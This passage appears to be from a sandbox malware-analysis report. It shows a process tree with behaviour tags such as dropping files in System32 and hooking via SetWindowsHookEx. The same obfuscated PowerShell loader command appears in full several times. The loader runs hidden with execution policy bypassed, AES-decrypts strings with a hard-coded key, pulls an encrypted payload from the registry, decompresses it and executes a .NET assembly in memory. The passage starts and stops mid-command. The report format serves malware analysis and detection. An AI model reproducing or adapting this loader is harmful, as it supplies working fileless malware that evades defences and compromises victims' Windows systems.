[System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        24⤵
        Checks computer location settings
        Drops file in System32 directory
        Suspicious use of SetWindowsHookEx
        
        PID:8924
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8924).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        25⤵
        
        PID:5540
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8924).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        25⤵
        
        PID:4512
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8924).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        25⤵
        
        PID:3988
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8924).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, 